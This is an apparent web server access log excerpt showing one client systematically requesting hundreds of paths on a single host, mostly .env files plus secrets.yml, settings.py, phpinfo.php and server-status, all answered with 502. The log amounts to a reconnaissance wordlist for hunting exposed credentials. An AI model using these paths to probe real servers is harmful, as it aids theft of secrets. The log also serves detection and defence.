+[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/rust-backend/dao/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/s-with-me-front/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/s3.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/saas/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/samples/chatroom/chatroom-spa/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/samples/docker/deploymentscripts/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/sapi/debug/default/view" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/script/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/scripts/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/scripts/fvt/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/secrets.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/secrets.yml" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/secrets/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/selfish-darling-backend/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/sendgrid.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/serve-browserbench/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/Serve_time_server/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/server-status" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/server.log" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/server/config/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/server/laravel/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/server/s3.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/server/src/persistence/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:03 +0000] - - 502 - GET https terminal.profibot.hu "/Server_with_db/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:04 +0000] - - 502 - GET https terminal.profibot.hu "/serverless.yml" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:04 +0000] - - 502 - GET https terminal.profibot.hu "/service-worker.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:04 +0000] - - 502 - GET https terminal.profibot.hu "/service/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:04 +0000] - - 502 - GET https terminal.profibot.hu "/services/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:04 +0000] - - 502 - GET https terminal.profibot.hu "/services/adminer/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:04 +0000] - - 502 - GET https terminal.profibot.hu "/services/deployment-agent/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:04 +0000] - - 502 - GET https terminal.profibot.hu "/services/documents/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:04 +0000] - - 502 - GET https terminal.profibot.hu "/services/graylog/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:04 +0000] - - 502 - GET https terminal.profibot.hu "/services/jaeger/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:04 +0000] - - 502 - GET https terminal.profibot.hu "/services/minio/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:04 +0000] - - 502 - GET https terminal.profibot.hu "/services/monitoring/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:04 +0000] - - 502 - GET https terminal.profibot.hu "/services/portainer/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:04 +0000] - - 502 - GET https terminal.profibot.hu "/services/redis-commander/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:04 +0000] - - 502 - GET https terminal.profibot.hu "/services/registry/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:04 +0000] - - 502 - GET https terminal.profibot.hu "/services/simcore/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:04 +0000] - - 502 - GET https terminal.profibot.hu "/services/traefik/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:04 +0000] - - 502 - GET https terminal.profibot.hu "/sessions/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:04 +0000] - - 502 - GET https terminal.profibot.hu "/settings.py" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:04 +0000] - - 502 - GET https terminal.profibot.hu "/shared/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:04 +0000] - - 502 - GET https terminal.profibot.hu "/shibboleth/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:04 +0000] - - 502 - GET https terminal.profibot.hu "/shop/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:04 +0000] - - 502 - GET https terminal.profibot.hu "/shopware/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:04 +0000] - - 502 - GET https terminal.profibot.hu "/Simple_server/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:04 +0000] - - 502 - GET https terminal.profibot.hu "/site-library/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:04 +0000] - - 502 - GET https terminal.profibot.hu "/sitemaps/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:04 +0000] - - 502 - GET https terminal.profibot.hu "/sites/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:04 +0000] - - 502 - GET https terminal.profibot.hu "/sitestatic/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:04 +0000] - - 502 - GET https terminal.profibot.hu "/Socketio/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:04 +0000] - - 502 - GET https terminal.profibot.hu "/source/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:04 +0000] - - 502 - GET https terminal.profibot.hu "/sources/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:04 +0000] - - 502 - GET https terminal.profibot.hu "/Sources/API/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:04 +0000] - - 502 - GET https terminal.profibot.hu "/spearmint/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:04 +0000] - - 502 - GET https terminal.profibot.hu "/spikes/config-material-app/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:04 +0000] - - 502 - GET https terminal.profibot.hu "/SpotiApps/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:04 +0000] - - 502 - GET https terminal.profibot.hu "/src/__tests__/__fixtures__/instanceWithDependentSteps/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:04 +0000] - - 502 - GET https terminal.profibot.hu "/src/__tests__/__fixtures__/typeScriptIntegrationProject/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:05 +0000] - - 502 - GET https terminal.profibot.hu "/src/__tests__/__fixtures__/typeScriptProject/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:05 +0000] - - 502 - GET https terminal.profibot.hu "/src/__tests__/__fixtures__/typeScriptVisualizeProject/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:05 +0000] - - 502 - GET https terminal.profibot.hu "/src/add-auth/express/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:05 +0000] - - 502 - GET https terminal.profibot.hu "/src/assembly/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:05 +0000] - - 502 - GET https terminal.profibot.hu "/src/character-service/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:05 +0000] - - 502 - GET https terminal.profibot.hu "/src/client/mobile/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:05 +0000] - - 502 - GET https terminal.profibot.hu "/src/core/tests/dotenv-files/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:05 +0000] - - 502 - GET https terminal.profibot.hu "/src/gameprovider-service/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:05 +0000] - - 502 - GET https terminal.profibot.hu "/src/main/front-end/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:05 +0000] - - 502 - GET https terminal.profibot.hu "/src/main/resources/archetype-resources/__rootArtifactId__-acceptance-test/src/test/resources/app-launcher-tile/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:05 +0000] - - 502 - GET https terminal.profibot.hu "/src/renderer/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:05 +0000] - - 502 - GET https terminal.profibot.hu "/srv6_controller/controller/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:05 +0000] - - 502 - GET https terminal.profibot.hu "/srv6_controller/examples/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:05 +0000] - - 502 - GET https terminal.profibot.hu "/srv6_controller/node-manager/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:05 +0000] - - 502 - GET https terminal.profibot.hu "/st-js-be-2020-movies-two/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:05 +0000] - - 502 - GET https terminal.profibot.hu "/stack.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:05 +0000] - - 502 - GET https terminal.profibot.hu "/stackato-pkg/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:05 +0000] - - 502 - GET https terminal.profibot.hu "/stag/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:05 +0000] - - 502 - GET https terminal.profibot.hu "/staging-api/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:05 +0000] - - 502 - GET https terminal.profibot.hu "/staging/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:05 +0000] - - 502 - GET https terminal.profibot.hu "/staging/api/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:05 +0000] - - 502 - GET https terminal.profibot.hu "/staging/backend/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:05 +0000] - - 502 - GET https terminal.profibot.hu "/staging/frontend/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:05 +0000] - - 502 - GET https terminal.profibot.hu "/static-collected/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:05 +0000] - - 502 - GET https terminal.profibot.hu "/static-html/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:05 +0000] - - 502 - GET https terminal.profibot.hu "/static-root/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:05 +0000] - - 502 - GET https terminal.profibot.hu "/static/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:05 +0000] - - 502 - GET https terminal.profibot.hu "/static/js/*.chunk.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:05 +0000] - - 502 - GET https terminal.profibot.hu "/static/js/main.11bc02d8.chunk.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:05 +0000] - - 502 - GET https terminal.profibot.hu "/static/js/main.1b34ee2a.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:05 +0000] - - 502 - GET https terminal.profibot.hu "/static/js/main.335d17a0.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:05 +0000] - - 502 - GET https terminal.profibot.hu "/static/js/main.36e5ec99.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:05 +0000] - - 502 - GET https terminal.profibot.hu "/static/js/main.48389ac6.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:05 +0000] - - 502 - GET https terminal.profibot.hu "/static/js/main.4aa2819f.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:05 +0000] - - 502 - GET https terminal.profibot.hu "/static/js/main.602cea98.chunk.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:05 +0000] - - 502 - GET https terminal.profibot.hu "/static/js/main.87c766e3.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:05 +0000] - - 502 - GET https terminal.profibot.hu "/static/js/main.89c971fa.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/static/js/main.8c18b542.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/static/js/main.bfa51071.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/static/js/main.ef8ecb99.chunk.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/static_prod/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/static_root/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/static_user/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/staticfiles/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/stats/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/storage/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/storage/.env.local" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/storage/debugbar/*.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/strapi/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/style/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/styles/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/stylesheets/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/swagger/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/symfony/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/system-config/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/system/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/system/config" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/system/phpinfo.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/target/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/temanr10/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/temanr9/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/temp.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/temp/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/template/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/templates/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/test" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/test-api/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/test-network/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/test-network/addOrg3/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/test/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/test/aries-js-worker/fixtures/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/test/bdd/fixtures/adapter-rest/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/test/bdd/fixtures/agent-rest/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/test/bdd/fixtures/couchdb/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:06 +0000] - - 502 - GET https terminal.profibot.hu "/test/bdd/fixtures/demo/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/test/bdd/fixtures/demo/openapi/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/test/bdd/fixtures/did-method-rest/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/test/bdd/fixtures/did-rest/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/test/bdd/fixtures/edv-rest/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/test/bdd/fixtures/openapi-demo/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/test/bdd/fixtures/sidetree-mock/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/test/bdd/fixtures/universalresolver/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/test/bdd/fixtures/vc-rest/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/test/fixtures/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/test/fixtures/app_types/node/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/test/fixtures/app_types/rails/.env" [Client 185.177.72.56] [Length 154] [Gzip 